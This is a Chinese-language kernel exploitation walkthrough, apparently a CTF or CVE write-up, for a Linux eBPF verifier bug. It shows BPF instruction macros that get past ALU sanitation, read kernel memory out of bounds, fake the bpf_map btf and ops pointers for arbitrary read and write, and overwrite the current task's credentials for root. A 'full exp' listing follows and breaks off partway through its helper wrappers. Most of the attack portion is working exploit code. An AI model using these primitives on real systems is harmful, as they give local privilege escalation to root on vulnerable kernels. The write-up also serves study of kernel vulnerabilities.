struct bpf_array_aux *aux;
/* alternative views of the trailing element storage */
union {
char value[0] __aligned(8);
void *ptrs[0] __aligned(8);
void __percpu *pptrs[0] __aligned(8);
};
};
  • 因此我们只需要前向读取便能读取到 bpf_map,之后可以通过 bpf_map 的函数表泄露内核地址

理论上我们可以构造寄存器,使 verifier 将负数识别为 “0”,但实际上我们还要突破 ALU Sanitation 的检查:

  • ALU Sanitation 是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier 静态分析的不足
  • 核心原理就是在 eBPF 程序中涉及指针运算的 ALU 指令前面添加上额外的辅助指令,对参与运算的偏移寄存器(off_reg)做运行时掩码:
1
2
3
4
5
6
7
8
9
10
11
/*
 * Fragment: instructions emitted in front of a sanitised pointer ALU op.
 * BPF_REG_AX is computed from alu_limit and off_reg and then ANDed with
 * off_reg. NOTE(review): as I read it, AX ends up all-ones when off_reg is
 * within the limit and zero otherwise - confirm against the kernel source.
 */
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
if (issrc) {
/* offset is the source operand: mask it into AX and use AX as the source */
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);
insn->src_reg = BPF_REG_AX;
} else {
/* offset is the destination operand: mask it in place */
*patch++ = BPF_ALU64_REG(BPF_AND, off_reg, BPF_REG_AX);
}
  • 其中 aux->alu_limit 为当前指针运算范围,初始时为 “0”,与指针所做的常量运算同步
  • 对于减法而言可读范围为 (ptr - alu_limit, ptr](这里保证了指针的偏移不会为负)

由于我们有运行时为 “1”,但 verifier 认为是 “0” 的寄存器,我们可以这样调整范围:

  • 构造另外一个同样是运行时值为 “1”,但 verifier 认为是 “0” 的寄存器 R8(可以选择直接将 R6 拷贝给 R8)
  • 令 R7 指向 map 第一个元素的第一个字节 value[0]
  • 将 R7 加上 0x1000:R7 = &value[0x1000],alu_limit = 0x1000
  • 将 R8 乘上 0x1000:R8 = 0x1000(verifier 仍认为是 0)
  • 执行 R7 -= R8,由于 verifier 认为 R8 为 “0”,因此 alu_limit 保持不变,但 R7 实际上已经指回了 value[0]
  • 执行 R7 -= 0x110:R7 = &value[-0x110],alu_limit = 0x1000
1
2
3
4
5
6
7
8
9
10
11
12
#define LEAK_MAP_OPS(__map_fd)                             \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

构造任意读 RAA:

现在我们能够读写 bpf_map 中的数据,我们需要注意其中的 btf 指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* Excerpt of the generic map header; "......" marks the elided members. */
struct bpf_map {
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf; /* passed to btf_obj_id() by bpf_map_get_info_by_fd() when non-NULL */
......
};

当函数 bpf_map_get_info_by_fd 被调用时,若 map->btf 不为空,程序会把 btf_obj_id(map->btf)(即 bpf_map->btf->id)作为 info.btf_id 拷贝给用户空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * Excerpt: fill a struct bpf_map_info for map and copy it to the user
 * buffer named in attr. Elided parts are marked with "......".
 * Returns 0 on success or -EFAULT when copying to user space fails.
 */
static int bpf_map_get_info_by_fd(struct file *file,
struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
struct bpf_map_info info;
u32 info_len = attr->info.info_len;
int err;

......

/* BTF identifiers are only reported when the map has a btf object */
if (map->btf) {
info.btf_id = btf_obj_id(map->btf);
info.btf_key_type_id = map->btf_key_type_id;
info.btf_value_type_id = map->btf_value_type_id;
}

......

/* hand the filled structure and its length back to user space */
if (copy_to_user(uinfo, &info, info_len) ||
put_user(info_len, &uattr->info.info_len))
return -EFAULT;

return 0;
}

劫持 bpf_map->btf 即可完成 RAA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Load the 8-byte value stored in map element __idx, subtract 0x58 and
 * write the result 0xd0 bytes before value[0] of element 0 (the article
 * identifies that location as bpf_map->btf).
 * Expects VULN_REG to have been prepared by MAKE_VULN_REG.
 */
#define READ_ARBITRARY_ADDR(__map_fd, __idx)            \
/* extend the alu->limit, then do the out-of-bounds write below */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map->btf(这里的 0x58 是 btf.id 的偏移:把 btf 指针写成 “目标地址 - 0x58”,这样内核读取 btf->id 时实际读到的就是目标地址处的 4 字节)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

/*
 * Read 8 bytes at addr by combining two 4-byte reads: map element 1 is
 * loaded with addr (low half) and element 2 with addr + 4 (high half).
 * Exits through err_exit() when a map update fails.
 */
size_t read_arbitrary_addr(int map_fd, size_t addr)
{
	size_t data;
	int key;
	/* Zero-initialised so the map update never copies stack garbage */
	size_t value[0x1000] = {0};

	key = 1;
	value[0] = addr;
	if (bpf_map_update_elem(map_fd, &key, value, 0) < 0){
		err_exit("FAILED to load value into map!");
	}
	key = 2;
	value[0] = addr + 4;
	if (bpf_map_update_elem(map_fd, &key, value, 0) < 0){
		err_exit("FAILED to load value into map!");
	}
	/* high half first, then the low half */
	data = read_arbitrary_addr_4_bytes(map_fd, 2);
	data <<= 32;
	data += read_arbitrary_addr_4_bytes(map_fd, 1);
	return data;
}

构造任意写 WAA:

核心思想就是将 bpf_map->ops 覆盖为 bpf_array.value 中的可控地址,并在该地址上伪造一个 fake ops,将 ops->map_push_elem 替换为 array_map_get_next_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
 * Store the index that follows *key into *next_key.
 * A NULL key or an index at or beyond max_entries yields 0; the last valid
 * index returns -ENOENT without writing; otherwise index + 1 is written.
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
/* a NULL key is treated as U32_MAX, which takes the first branch below */
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;

if (index >= array->map.max_entries) {
*next = 0;
return 0;
}

if (index == array->map.max_entries - 1)
return -ENOENT;

*next = index + 1;
return 0;
}
  • 当 key(index)小于 map.max_entries - 1 时,index + 1 会被写入到 next_key 指向的内存当中
  • 如果正常调用 map_get_next_key:只能控制 key 但是 next_key 不能控制
  • 如果通过函数指针 ops->map_push_elem 进行调用:可以控制这两个参数

当我们更新 eBPF map 时,若 map 类型为 BPF_MAP_TYPE_QUEUE 或 BPF_MAP_TYPE_STACK,则函数 bpf_map->ops->map_push_elem 就会被调用,不过在函数 map_update_elem 中还有一个检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Excerpt of the map-update syscall handler; "......" marks elided code. */
static int map_update_elem(union bpf_attr *attr)
{

......

/* BPF_F_LOCK is rejected unless the map value contains a spin lock */
if ((attr->flags & BPF_F_LOCK) &&
!map_value_has_spin_lock(map)) {
err = -EINVAL;
goto err_put;
}

......

return err;
}
1
2
3
4
/* True when map->spin_lock_off is non-negative. */
static inline bool map_value_has_spin_lock(const struct bpf_map *map)
{
return map->spin_lock_off >= 0;
}
  • 若 flags 设置了 BPF_F_LOCK 标志位,则会检查 map->spin_lock_off 是否大于等于 0,因此这里我们还要将该字段改为一个正整数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#define MAKE_ARBITRARY_WRITE_OPS(__map_fd)                  \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map 中的各个条目:
    • spin_lock_off = 0x2000(绕过 map_update_elem 中的检查)
    • max_entries = 0xffffffff(为了满足 key < map.max_entries 的条件)
    • map_type = 23(BPF_MAP_TYPE_STACK)(为了使 bpf_map->ops->map_push_elem 能被调用)
    • ops = target_addr(设置写入的目标地址)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/*
 * Copy the current map ops table into map element 1, with map_push_elem
 * replaced, store the address of that copy in element 2, then run the
 * MAKE_ARBITRARY_WRITE_OPS program. Exits through err_exit() when a map
 * update fails.
 */
void make_arbitrary_write_ops(int map_fd){
	struct bpf_insn prog[] = {
		TRIGGER_VULN(map_fd),
		MAKE_VULN_REG(map_fd),
		MAKE_ARBITRARY_WRITE_OPS(map_fd),
		BPF_EXIT_INSN()};
	int key;
	size_t per_ops_ptr, value_idx;
	/* Zero-initialised so the map updates never copy stack garbage */
	size_t value[0x1000] = {0};
	struct bpf_map_ops *ops_data;

	/* address of map element 1's value, where the fake ops table is stored */
	fake_ops_addr = map_addr + 0x110 + MAP_SIZE;

	/* read the original bpf_map->ops table so the other callbacks keep working */
	value_idx = 0;
	for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
		per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
		value[value_idx++] = per_ops_ptr;
	}

	/* replace map_push_elem in the copied table */
	ops_data = (struct bpf_map_ops *)value;
	ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
	key = 1;
	if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
		err_exit("FAILED to load value into map!");
	}

	key = 2;
	value[0] = fake_ops_addr;
	if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
		err_exit("FAILED to load value into map!");
	}

	run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

在获取以上所有组件之后,程序的入侵步骤如下:

  • 泄露 map_ops_addr 计算内核基地址
  • 泄露 map_addr
  • 利用 RAA 扫描内存,泄露 current_task 和 current_cred
  • 覆盖 bpf_map->ops->map_push_elem,为 WAA 做准备
  • 利用 WAA 覆盖 current_cred 并进行提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/if_packet.h>

/* Write a red, bold "[x] Run eBPF error: " banner followed by msg to stdout. */
static __always_inline void err_print(const char *msg)
{
	fprintf(stdout, "\033[31m\033[1m[x] Run eBPF error: \033[0m%s\n", msg);
}

/*
 * Build one struct bpf_insn from its five raw fields. Every other
 * instruction macro below expands to this one.
 */
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM \
})

/* ALU operation with a register source (BPF_X): 64-bit and 32-bit class */
#define BPF_ALU64_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU32_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

/* ALU operation with an immediate source (BPF_K): 64-bit and 32-bit class */
#define BPF_ALU64_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU32_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

/* Register-to-register move: 64-bit and 32-bit class */
#define BPF_MOV64_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV32_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

/* Immediate-to-register move: 64-bit and 32-bit class */
#define BPF_MOV64_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV32_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

/*
 * 64-bit immediate load. Expands to TWO instructions: the first carries
 * the low 32 bits of IMM, the second (all other fields zero) the high 32.
 */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_DW | BPF_IMM, DST, SRC, 0, (uint32_t) (IMM)),\
BPF_RAW_INSN(0, 0, 0, 0, ((uint64_t) (IMM)) >> 32)

/* 64-bit immediate load with src_reg = 0 */
#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)

/* Fallback definition for headers that do not provide BPF_PSEUDO_MAP_FD */
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */
#define BPF_LD_ABS(SIZE, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, 0, 0, 0, IMM)

/* dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

/* *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, DST, SRC, OFF, OP)

#define BPF_STX_XADD(SIZE, DST, SRC, OFF) \
BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* *(uint *) (dst_reg + off16) = imm */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_JMP_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() \
BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

/*
 * Instruction sequence: look up element __idx of the map referred to by
 * __map_fd and leave the resulting value pointer in __dst_reg.
 *
 * Expands to a comma-separated list of struct bpf_insn initializers, so it
 * must be used inside a struct bpf_insn array initializer.
 *
 * Registers written by the sequence itself: R9 (map reference), R1 (copy of
 * R9, first helper argument), R2 (R10 - 8, address of the key on the stack),
 * R0 (helper result, then reset to 0) and __dst_reg. The key is stored as an
 * 8-byte immediate at R10 - 8.
 * If the helper returns 0 the program exits immediately.
 * NOTE(review): the helper call presumably also clobbers R1-R5 per the BPF
 * calling convention - confirm before keeping live values there.
 */
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* load the map reference into R9 and pass it as the first argument */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* on success r0 is a pointer to the value; r0 == 0 means the lookup failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* move the result into the destination register and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#ifndef __user
#define __user
#endif

#ifndef __rcu
#define __rcu
#endif

struct bpf_map;
struct btf;
struct btf_type;
struct bpf_prog;
struct bpf_prog_aux;
struct poll_table_struct;
struct vm_area_struct;
struct bpf_local_storage_map;

/*
 * map is generic key/value storage optionally accessible by eBPF programs.
 *
 * Userspace copy of the map operations table: a flat list of function
 * pointers followed by three data pointers.
 * NOTE(review): the member order presumably has to match the target kernel's
 * own definition exactly, since code that overlays this struct on raw bytes
 * relies on the member offsets - confirm against the kernel version in use.
 * NOTE(review): struct file, struct seq_file, struct bpf_iter_seq_info and
 * struct bpf_local_storage are not forward-declared above, and __poll_t must
 * come from an included header - confirm this compiles warning-free.
 */
struct bpf_map_ops {
/* funcs callable from userspace (via syscall) */
int (*map_alloc_check)(union bpf_attr *attr);
struct bpf_map *(*map_alloc)(union bpf_attr *attr);
void (*map_release)(struct bpf_map *map, struct file *map_file);
void (*map_free)(struct bpf_map *map);
int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
void (*map_release_uref)(struct bpf_map *map);
void *(*map_lookup_elem_sys_only)(struct bpf_map *map, void *key);
int (*map_lookup_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_lookup_and_delete_batch)(struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_update_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_delete_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);

/* funcs callable from userspace and from eBPF programs */
void *(*map_lookup_elem)(struct bpf_map *map, void *key);
int (*map_update_elem)(struct bpf_map *map, void *key, void *value,
uint64_t flags);
int (*map_delete_elem)(struct bpf_map *map, void *key);
int (*map_push_elem)(struct bpf_map *map, void *value, uint64_t flags);
int (*map_pop_elem)(struct bpf_map *map, void *value);
int (*map_peek_elem)(struct bpf_map *map, void *value);

/* funcs called by prog_array and perf_event_array map */
void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
int fd);
void (*map_fd_put_ptr)(void *ptr);
int (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
uint32_t (*map_fd_sys_lookup_elem)(void *ptr);
void (*map_seq_show_elem)(struct bpf_map *map, void *key,
struct seq_file *m);
int (*map_check_btf)(const struct bpf_map *map,
const struct btf *btf,
const struct btf_type *key_type,
const struct btf_type *value_type);

/* Prog poke tracking helpers. */
int (*map_poke_track)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_untrack)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_run)(struct bpf_map *map, uint32_t key,
struct bpf_prog *old, struct bpf_prog *new);

/* Direct value access helpers. */
int (*map_direct_value_addr)(const struct bpf_map *map,
uint64_t *imm, uint32_t off);
int (*map_direct_value_meta)(const struct bpf_map *map,
uint64_t imm, uint32_t *off);
int (*map_mmap)(struct bpf_map *map, struct vm_area_struct *vma);
__poll_t (*map_poll)(struct bpf_map *map, struct file *filp,
struct poll_table_struct *pts);

/* Functions called by bpf_local_storage maps */
int (*map_local_storage_charge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
void (*map_local_storage_uncharge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
struct bpf_local_storage __rcu ** (*map_owner_storage_ptr)(void *owner);

/* map_meta_equal must be implemented for maps that can be
* used as an inner map. It is a runtime check to ensure
* an inner map can be inserted to an outer map.
*
* Some properties of the inner map has been used during the
* verification time. When inserting an inner map at the runtime,
* map_meta_equal has to ensure the inserting map has the same
* properties that the verifier has used earlier.
*/
int (*map_meta_equal)(const struct bpf_map *meta0,
const struct bpf_map *meta1);

/* BTF name and id of struct allocated by map_alloc */
const char * const map_btf_name;
int *map_btf_id;

/* bpf_iter info used to open a seq_file */
const struct bpf_iter_seq_info *iter_seq_info;
};

/*
 * Raw bpf(2) syscall wrapper.
 * Always passes the full size of union bpf_attr as the attribute size and
 * returns the syscall result narrowed to int.
 */
static __always_inline int bpf(int cmd, union bpf_attr *attr)
{
    long rc = syscall(__NR_bpf, cmd, attr, sizeof(union bpf_attr));

    return (int) rc;
}

/*
 * Load a BPF program with BPF_PROG_LOAD (license "GPL").
 *
 * prog_type:   BPF_PROG_TYPE_* value
 * insns:       instruction array
 * insn_cnt:    number of instructions (stored in a 32-bit attr field)
 * log_buf:     buffer receiving the verifier log
 * log_buf_sz:  size of log_buf in bytes
 * log_level:   verifier log level
 *
 * Returns whatever bpf() returns for BPF_PROG_LOAD (callers in this file
 * treat a negative value as failure).
 */
static __always_inline int
bpf_load_prog(unsigned int prog_type, struct bpf_insn *insns, uint64_t insn_cnt,
              char *log_buf, unsigned int log_buf_sz, unsigned int log_level)
{
    union bpf_attr attr;

    /*
     * Zero the whole union explicitly: a brace initializer is only
     * guaranteed to initialize the named member, and the kernel validates
     * that attribute bytes unused by the command are zero.
     */
    memset(&attr, 0, sizeof(attr));
    attr.prog_type = prog_type;
    attr.insns = (uint64_t) (uintptr_t) insns;
    attr.insn_cnt = (uint32_t) insn_cnt;
    attr.license = (uint64_t) (uintptr_t) "GPL";
    attr.log_level = log_level;
    attr.log_buf = (uint64_t) (uintptr_t) log_buf;
    attr.log_size = log_buf_sz;

    return bpf(BPF_PROG_LOAD, &attr);
}

/*
 * Create a BPF map with BPF_MAP_CREATE.
 *
 * map_type:    BPF_MAP_TYPE_* value
 * key_size:    key size in bytes
 * value_size:  value size in bytes
 * max_entries: maximum number of elements
 *
 * Returns whatever bpf() returns (callers in this file treat a negative
 * value as failure and otherwise use the result as the map fd).
 */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
    union bpf_attr attr;

    /* Clear every byte: the kernel rejects non-zero unused attr bytes. */
    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return bpf(BPF_MAP_CREATE, &attr);
}

/*
 * Copy the value stored under *key in map_fd into *value
 * (BPF_MAP_LOOKUP_ELEM). The caller provides a value buffer large enough
 * for the map's value size. Returns the bpf() result.
 */
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void *key, void *value)
{
    union bpf_attr attr;

    /* Clear every byte: the kernel rejects non-zero unused attr bytes. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t) (uintptr_t) key;
    attr.value = (uint64_t) (uintptr_t) value;

    return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

/*
 * Store *value under *key in map_fd (BPF_MAP_UPDATE_ELEM), passing flags
 * through unchanged in the attr's flags field. Returns the bpf() result.
 */
static __always_inline int
